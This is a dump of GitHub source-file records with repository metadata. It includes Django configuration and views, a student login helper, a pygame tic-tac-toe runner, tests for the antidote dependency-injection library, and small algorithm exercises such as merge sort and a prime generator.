| 2021-08-25T13:19:58
| 399,701,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
"""
ASGI config for csvproject project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'csvproject.settings')
application = get_asgi_application()
|
[
"pranavsharma.bluethink@gmail.com"
] |
pranavsharma.bluethink@gmail.com
|
8ba930f1c714f0c44e85c4caa833e69602d2cab8
|
e993298ef337133c1c2997812904fca12fd91fde
|
/blue_garden/usr_login/usersdict.py
|
51ea982d126b5a422f506b697e888107b9ac683f
|
[] |
no_license
|
jloc8749/info9117
|
54cbf91b8afe2f03cf8283dfe16a27cec86552c4
|
b256eec143c38489b6ca0587eacb11cbfa8f97d4
|
refs/heads/master
| 2021-01-10T09:50:31.239944
| 2016-04-13T05:36:39
| 2016-04-13T05:36:39
| 52,838,194
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 937
|
py
|
#make dict of users
testuser = 'jlock'
testpass = 'jlock'
usr_dict = {}
def usrdict():
with open('users','r') as u:
for each in u:
usrname, usrpass = each.split()
usr_dict[usrname] = usrpass
#return usrdict
def authuser(nombre,llave):
usrdict()
if nombre in usr_dict:
if usr_dict[nombre] == llave:
return True
def newuser(nombre,llave):
usrdict()
with open('users','a') as u:
if nombre not in usr_dict:
#u.write(nombre + ' ' + llave + '/n') #appending to the same line..
print (nombre + ' ' + llave, file=u)
def rm_usr(nombre,llave):
tmp = []
with open('users','r') as u:
for line in u:
if nombre+' '+llave not in line:
tmp.append(line)
with open('users','w') as u:
for line in tmp:
print(line.strip(), file=u)
|
[
"jloc8749@uni.syd.edu.au"
] |
jloc8749@uni.syd.edu.au
|
924887382913b82d8d2d05d43ee875974db1d057
|
cbac621ad77787ebe9bda49976dab711e3169362
|
/commercia/products/management/commands/remove_categories.py
|
db4ef8ef9ada36c1898e271a41801c13cf5dca57
|
[] |
no_license
|
commoncode/economica
|
08292f28048281ee986ce4419c7d0af54ccad1db
|
3de2415d7f0e0e81cc6ac7a054839daeb1ba6748
|
refs/heads/master
| 2016-09-05T12:49:21.107938
| 2014-08-04T04:50:43
| 2014-08-04T04:50:43
| 9,742,821
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
from django.core.management.base import BaseCommand
from ...models import Category
class Command(BaseCommand):
help = 'Clean up Menus'
def handle(self, *args, **options):
Category.objects.all().delete()
|
[
"dboy.y3k@gmail.com"
] |
dboy.y3k@gmail.com
|
59b2814b3a0dbeb677cab11c92ad4e0fcb9478f3
|
46ef1b8df9551c02c273ed39bd057daadca0e1fe
|
/parts/wrapper/zope/component/event.py
|
12abd1cfcc204ce689d7c2d5f7876ddf40d08551
|
[] |
no_license
|
topiaruss/bfg-gae-logger
|
18f5a25168656afcabe1c89a9c7e0e25aa060c56
|
f2944f2c009007efd0fd09426111e4dfdab30098
|
refs/heads/master
| 2021-01-20T04:40:05.194810
| 2010-05-26T20:31:02
| 2010-05-26T20:31:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 92
|
py
|
/Users/russ/.common/sh/.buildout/eggs/zope.component-3.9.4-py2.5.egg/zope/component/event.py
|
[
"russf@topia.com"
] |
russf@topia.com
|
4b89f7e8772827e23a6837fea948a8864f3ca14e
|
57d07cbe26827e3610f14294d00db60e62deb0c6
|
/BJ/sort/수정렬하기2/mergeSort.py
|
484275d7dfbccd645d12398be2b009577d9faba5
|
[] |
no_license
|
wseungjin/AlgorithmCoding
|
98083f5b87db17bf4449c1ca23216dfa5fd66f73
|
00dc9a76ef1a890ddf185d1b7feecc71b2c95296
|
refs/heads/master
| 2021-06-22T04:02:30.390820
| 2021-04-12T15:00:16
| 2021-04-12T15:00:16
| 209,197,457
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,014
|
py
|
# f = open("input.txt", 'r')
# line = f.readline()
line = input()
num = int(line)
array = []
for i in range(num):
# line = f.readline()
line = input()
array.append(int(line))
def mergeSort(list):
if(len(list)<=1):
return list
mid = len(list)//2
leftList = list[0:mid]
rightList = list[mid:len(list)]
leftList=mergeSort(leftList)
rightList=mergeSort(rightList)
return merge(leftList,rightList)
def merge(left,right):
mergedList =[]
while len(left) != 0 or len(right) != 0:
if len(left) == 0:
mergedList.append(right[0])
right.pop(0)
elif len(right) == 0:
mergedList.append(left[0])
left.pop(0)
elif(left[0]>right[0]):
mergedList.append(right[0])
right.pop(0)
else:
mergedList.append(left[0])
left.pop(0)
return mergedList
array=mergeSort(array)
for i in range(num):
print(array[i])
|
[
"bose1021@naver.com"
] |
bose1021@naver.com
|
c8b5729bd9c20925ad5ceacf9485ae56d25d8550
|
6dd6ff94464d53d5d65e36e86ece49f2902bc85f
|
/coupons/views.py
|
813aea7b230f7875ec1c3d88983abe228e08736a
|
[] |
no_license
|
onealwills/myshop
|
6914981ba9de60316f9196ebf4a25ada87e81864
|
248a575072a8e9d5553d507b6a80f798e3bb8f39
|
refs/heads/main
| 2023-07-06T02:01:59.233570
| 2021-08-13T08:52:54
| 2021-08-13T08:52:54
| 394,821,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 819
|
py
|
from django.shortcuts import render, redirect
from django.utils import timezone
from django.views.decorators.http import require_POST
from .models import Coupon
from .forms import CouponApplyForm
# Create your views here.
@require_POST
def coupon_apply(request):
now = timezone.now()
form = CouponApplyForm(request.POST)
if form.is_valid():
code = form.cleaned_data['code']
try:
coupon = Coupon.objects.get(code__iexact=code,
valid_from__lte=now,
valid_to__gte=now,
active=True)
request.session['coupon_id'] = coupon.id
except Coupon.DoesNotExist:
request.session['coupon_id'] = None
return redirect('cart:cart_detail')
|
[
"oneal.wills@gmail.com"
] |
oneal.wills@gmail.com
|
afa0407ed6f5d1af4d9575f2a95b7ab3e70e86b9
|
72e8d6fea71e523cee9aee585b7b52fccf36d4b5
|
/PythonExercicios/ex002.py
|
e01d06a9d6386ce09830cc06f9c987ff9fd5cb32
|
[] |
no_license
|
maripaixao/PycharmProjects
|
e7939857ec995c39b4fb2e85f5075b41614509e8
|
3ecfa9aa6616c3bdcb5f0c029fdda2ea68e55d3c
|
refs/heads/master
| 2023-06-19T00:54:52.420194
| 2021-07-19T21:18:34
| 2021-07-19T21:18:34
| 387,594,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 81
|
py
|
nome = input("Qual seu nome?")
print("Prazer em te conhecer, {}!".format(nome))
|
[
"marinapaixao.25@gmail.com"
] |
marinapaixao.25@gmail.com
|
f247cedc5f3d6f037b2f74c163e14180b0a056fd
|
53909cfcc2b142716021bf8589cccc37c426aa9c
|
/bin/blogtk2
|
2c2e50e6a98bd225e96d115696f9071700abf738
|
[
"Apache-2.0"
] |
permissive
|
Ryuno-Ki/BloGTK3
|
7fba56ed0f6ed36eadadad374cf5e045fd9167e0
|
e410f164cb82ff37ca9c0f3ebaf8e57b76139551
|
refs/heads/master
| 2016-09-06T02:03:56.552113
| 2013-06-07T08:39:52
| 2013-06-07T08:39:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 210
|
#!/usr/bin/env python
import sys
from os.path import dirname, join, pardir
sys.path.insert(0, join(dirname(__file__), pardir, 'share',
'blogtk2', 'lib'))
from blogtk2 import main
main()
|
[
"AndreJaenisch@googlemail.com"
] |
AndreJaenisch@googlemail.com
|
|
87769f81ff8aa748efc928170fe85552099057a8
|
bf1af2969ce4952360c604844b1468e4ebce2fc6
|
/tictactoe/runner.py
|
35f1777fee7e44cf3be411a245a92b42f55b11e3
|
[] |
no_license
|
emreisler/myprojects
|
2de7dbda68d6009bd19b640f5ef6ddae06748244
|
2d408cf2919aea4cfd8783b9e5dc2696d9d6b806
|
refs/heads/master
| 2023-01-05T20:53:53.420342
| 2020-11-04T12:25:54
| 2020-11-04T12:25:54
| 293,348,825
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,737
|
py
|
import pygame
import sys
import time
import tictactoe as ttt
pygame.init()
size = width, height = 600, 400
# Colors
black = (0, 0, 0)
white = (255, 255, 255)
screen = pygame.display.set_mode(size)
mediumFont = pygame.font.Font("OpenSans-Regular.ttf", 28)
largeFont = pygame.font.Font("OpenSans-Regular.ttf", 40)
moveFont = pygame.font.Font("OpenSans-Regular.ttf", 60)
user = None
board = ttt.initial_state()
ai_turn = False
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
screen.fill(black)
# Let user choose a player.
if user is None:
# Draw title
title = largeFont.render("Play Tic-Tac-Toe", True, white)
titleRect = title.get_rect()
titleRect.center = ((width / 2), 50)
screen.blit(title, titleRect)
# Draw buttons
playXButton = pygame.Rect((width / 8), (height / 2), width / 4, 50)
playX = mediumFont.render("Play as X", True, black)
playXRect = playX.get_rect()
playXRect.center = playXButton.center
pygame.draw.rect(screen, white, playXButton)
screen.blit(playX, playXRect)
playOButton = pygame.Rect(5 * (width / 8), (height / 2), width / 4, 50)
playO = mediumFont.render("Play as O", True, black)
playORect = playO.get_rect()
playORect.center = playOButton.center
pygame.draw.rect(screen, white, playOButton)
screen.blit(playO, playORect)
# Check if button is clicked
click, _, _ = pygame.mouse.get_pressed()
if click == 1:
mouse = pygame.mouse.get_pos()
if playXButton.collidepoint(mouse):
time.sleep(0.2)
user = ttt.X
elif playOButton.collidepoint(mouse):
time.sleep(0.2)
user = ttt.O
else:
# Draw game board
tile_size = 80
tile_origin = (width / 2 - (1.5 * tile_size),
height / 2 - (1.5 * tile_size))
tiles = []
for i in range(3):
row = []
for j in range(3):
rect = pygame.Rect(
tile_origin[0] + j * tile_size,
tile_origin[1] + i * tile_size,
tile_size, tile_size
)
pygame.draw.rect(screen, white, rect, 3)
if board[i][j] != ttt.EMPTY:
move = moveFont.render(board[i][j], True, white)
moveRect = move.get_rect()
moveRect.center = rect.center
screen.blit(move, moveRect)
row.append(rect)
tiles.append(row)
game_over = ttt.terminal(board)
player = ttt.player(board)
# Show title
if game_over:
winner = ttt.winner(board)
if winner is None:
title = f"Game Over: Tie."
else:
title = f"Game Over: {winner} wins."
elif user == player:
title = f"Play as {user}"
else:
title = f"Computer thinking..."
title = largeFont.render(title, True, white)
titleRect = title.get_rect()
titleRect.center = ((width / 2), 30)
screen.blit(title, titleRect)
# Check for AI move
if user != player and not game_over:
if ai_turn:
time.sleep(0.5)
move = ttt.minimax(board)
board = ttt.result(board, move)
ai_turn = False
else:
ai_turn = True
# Check for a user move
click, _, _ = pygame.mouse.get_pressed()
if click == 1 and user == player and not game_over:
mouse = pygame.mouse.get_pos()
for i in range(3):
for j in range(3):
if (board[i][j] == ttt.EMPTY and tiles[i][j].collidepoint(mouse)):
board = ttt.result(board, (i, j))
if game_over:
againButton = pygame.Rect(width / 3, height - 65, width / 3, 50)
again = mediumFont.render("Play Again", True, black)
againRect = again.get_rect()
againRect.center = againButton.center
pygame.draw.rect(screen, white, againButton)
screen.blit(again, againRect)
click, _, _ = pygame.mouse.get_pressed()
if click == 1:
mouse = pygame.mouse.get_pos()
if againButton.collidepoint(mouse):
time.sleep(0.2)
user = None
board = ttt.initial_state()
ai_turn = False
pygame.display.flip()
|
[
"noreply@github.com"
] |
emreisler.noreply@github.com
|
cb7487342f6f94441614a56b159aa70cef3ba11e
|
0ce3dfdc3d2de8cdee8116c97ed7a750e02d9040
|
/tests/test_class_auto_wiring.py
|
38255c0998e5c149c78ed9cdebb98701eb32bdf5
|
[
"MIT"
] |
permissive
|
adriangb/antidote
|
c1d3d99406f1efce7b0e1f66373db7c00bbe1077
|
97751e0e6a1b8bd638a1c33212345c7a84ad97b8
|
refs/heads/master
| 2023-09-03T09:58:08.065608
| 2021-11-06T20:56:20
| 2021-11-06T21:48:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,752
|
py
|
import itertools
from typing import Any, Callable, Optional, Tuple, Type, Union
import pytest
from antidote import Constants, Factory, Provide, Service, world, service
from antidote._compatibility.typing import Protocol
from antidote.core import Wiring
class Interface:
pass
class FactoryOutput:
pass
class FactoryOutput2:
pass
class A:
pass
class B:
pass
@pytest.fixture(autouse=True)
def new_world():
with world.test.new():
world.test.singleton({A: A(),
B: B(),
'a': object(),
'b': object(),
'x': object(),
'y': object(),
'z': object()})
yield
class DummyProtocol(Protocol):
a: A
b: B
def __init__(self, a: A = None, b: B = None):
pass
def method_AB(self, a: A = None, b: B = None) -> Tuple[A, B]:
pass
def method_ab(self, a=None, b=None) -> Tuple[Any, Any]:
pass
def method_xyz(self, x=None, y=None, z=None) -> Tuple[Any, Any, Any]:
pass
DEFAULT_WIRING = object()
def builder(cls_or_decorator: Union[type, Callable[..., Any]],
wiring_kind: str = 'Wiring',
subclass: bool = False):
meta_kwargs = dict(abstract=True) if subclass else dict()
if isinstance(cls_or_decorator, type):
cls = cls_or_decorator
def decorator(wiring=None):
return lambda x: x
else:
cls = object
decorator = cls_or_decorator
def build(wiring: Wiring = None):
decorate = (decorator(wiring=wiring)
if wiring is not DEFAULT_WIRING else
decorator())
@decorate
class Dummy(cls, **meta_kwargs):
if wiring is not DEFAULT_WIRING and cls is not object:
if wiring is not None:
if wiring_kind == 'Wiring':
__antidote__ = cls.Conf(wiring=wiring)
else:
__antidote__ = cls.Conf().with_wiring(**{
attr: getattr(wiring, attr)
for attr in Wiring.__slots__
})
else:
__antidote__ = cls.Conf(wiring=None)
def __init__(self, a: Provide[A] = None, b: Provide[B] = None):
super().__init__()
self.a = a
self.b = b
def method_AB(self, a: A = None, b: B = None) -> Tuple[A, B]:
return a, b
def method_ab(self, a=None, b=None) -> Tuple[Any, Any]:
return a, b
def method_xyz(self, x=None, y=None, z=None) -> Tuple[Any, Any, Any]:
return x, y, z
def __call__(self) -> FactoryOutput: # for Factory
pass
def get(self): # for Constants
pass
if subclass:
class SubDummy(Dummy):
def __call__(self) -> FactoryOutput2: # for Factory
pass
return SubDummy
else:
return Dummy
return build
@pytest.fixture(params=[
pytest.param((builder, service), id="@service"),
*[
pytest.param((builder, c, w), id=f"{c.__name__} - {w}")
for (c, w) in itertools.product([Factory,
Service,
Constants],
['with_wiring', 'Wiring'])
]
])
def class_builder(request):
f, *args = request.param
return f(*args)
@pytest.fixture(params=[
pytest.param((c, w), id=f"{c.__name__} - w")
for (c, w) in itertools.product([Factory,
Service,
Constants],
['with_wiring', 'Wiring'])
])
def subclass_builder(request):
(cls, wiring_kind) = request.param
return builder(cls, wiring_kind, subclass=True)
F = Callable[[Optional[Wiring]], Type[DummyProtocol]]
def test_default(class_builder: F):
dummy = class_builder(DEFAULT_WIRING)()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is None
assert b is None
def test_no_wiring(class_builder: F):
dummy = class_builder(None)()
assert dummy.a is None
assert dummy.b is None
def test_methods(class_builder: F):
dummy = class_builder(Wiring(methods=('__init__',)))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is None
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',),
auto_provide=True))()
assert dummy.a is None
assert dummy.b is None
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
def test_auto_provide(class_builder: F):
# Uses type hints by default
dummy = class_builder(Wiring(methods=('method_AB',)))()
(a, b) = dummy.method_AB()
assert a is None
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',), auto_provide=True))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
dummy = class_builder(Wiring(methods=('method_AB',), auto_provide=False))()
(a, b) = dummy.method_AB()
assert a is None
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',), auto_provide=[A]))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',),
auto_provide=lambda cls: True))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
dummy = class_builder(Wiring(methods=('method_AB',),
auto_provide=lambda cls: issubclass(cls, A)))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is None
dummy = class_builder(Wiring(methods=('method_AB',),
auto_provide=lambda cls: False))()
(a, b) = dummy.method_AB()
assert a is None
assert b is None
def test_dependencies_dict(class_builder: F):
dummy = class_builder(Wiring(dependencies=dict(),
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is None
assert b is None
dummy = class_builder(Wiring(dependencies=dict(a='x', b='y'),
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is world.get('y')
dummy = class_builder(Wiring(dependencies=dict(b='y'),
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is None
assert b is world.get('y')
def test_dependencies_seq(class_builder: F):
dummy = class_builder(Wiring(dependencies=[],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is None
assert b is None
dummy = class_builder(Wiring(dependencies=[None, None],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is None
assert b is None
dummy = class_builder(Wiring(dependencies=['x', 'y'],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is world.get('y')
dummy = class_builder(Wiring(dependencies=[None, 'y'],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is None
assert b is world.get('y')
dummy = class_builder(Wiring(dependencies=['x', None],
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is None
def test_dependencies_callable(class_builder: F):
dummy = class_builder(Wiring(dependencies=lambda arg: None,
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is None
assert b is None
dummy = class_builder(Wiring(dependencies=lambda arg: 'x' if arg.name == 'a' else 'y',
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get('y')
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is world.get('y')
dummy = class_builder(Wiring(
dependencies=lambda arg: 'x' if arg.name == 'a' else None,
auto_provide=True))()
assert dummy.a is world.get(A)
assert dummy.b is world.get(B)
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get(B)
(a, b) = dummy.method_ab()
assert a is world.get('x')
assert b is None
def test_distinct_arguments(class_builder: F):
# Having more arguments in dependencies seq is not an issue for methods having less.
dummy = class_builder(Wiring(methods=('method_AB', 'method_xyz'),
dependencies=['x', None, 'z'],
auto_provide=True))()
(a, b) = dummy.method_AB()
assert a is world.get('x')
assert b is world.get(B)
(x, y, z) = dummy.method_xyz()
assert x is world.get('x')
assert y is None
assert z is world.get('z')
# Unknown argument in the dependencies dict won't raise an error.
dummy = class_builder(Wiring(methods=('method_AB', 'method_xyz'),
dependencies=dict(b='b', y='y'),
auto_provide=True))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is world.get('b')
(x, y, z) = dummy.method_xyz()
assert x is None
assert y is world.get('y')
assert z is None
# type_hints
dummy = class_builder(Wiring(methods=('method_AB', 'method_xyz'),
auto_provide=[A]))()
(a, b) = dummy.method_AB()
assert a is world.get(A)
assert b is None
(x, y, z) = dummy.method_xyz()
assert x is None
assert y is None
assert z is None
|
[
"rabier.benj@gmail.com"
] |
rabier.benj@gmail.com
|
fc67e11ae0ec8985fac5e9c4474302e3c792647f
|
6774b1ed1b40eb4777cddac01a8846fbb9b49d6f
|
/Stepik/13_function/test.py
|
e67b3c66824ae1faf9dcc3de4955fa43189baffe
|
[] |
no_license
|
Surgeon-76/KaPythoshka
|
b664ed7c8552a01c4c931cbb5842fd9b189f4149
|
faf010e58d2d493ab0e91dc7e99540cb65c26a84
|
refs/heads/main
| 2023-08-28T19:20:21.818633
| 2023-08-09T11:14:51
| 2023-08-09T11:14:51
| 339,171,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 115
|
py
|
def print_text(text, num):
while num > 0:
print(text, end='')
num -= 1
print_text('Python', 4)
|
[
"surgeon76@outlook.com"
] |
surgeon76@outlook.com
|
6b244d907047478f01653ac411361939a79e31a0
|
cafb95a9475855c3ddf9d21de24d96d9fbcb4fee
|
/Wk5 Ex genPrimes.py
|
e181e94351f60c70da7f1cc3d200f5d15d4c4a81
|
[] |
no_license
|
kj0y/edX-MITx-6.00.1x
|
3728e95062324092a5fe2d43955e70e0a635a2ba
|
f31fd8736d9d5adc6b2752777f46a8c57dc48d8b
|
refs/heads/master
| 2020-03-23T02:06:16.182107
| 2018-08-05T23:11:59
| 2018-08-05T23:11:59
| 140,955,107
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 461
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 5 14:29:40 2018
@author: kandi
"""
def genPrimes():
primes = []
numerator = 2
last = numerator
while True:
for denom in primes:
if numerator % denom == 0:
numerator += 1
break
else:
primes.append(numerator)
last = numerator
numerator += 1
yield last
|
[
"noreply@github.com"
] |
kj0y.noreply@github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.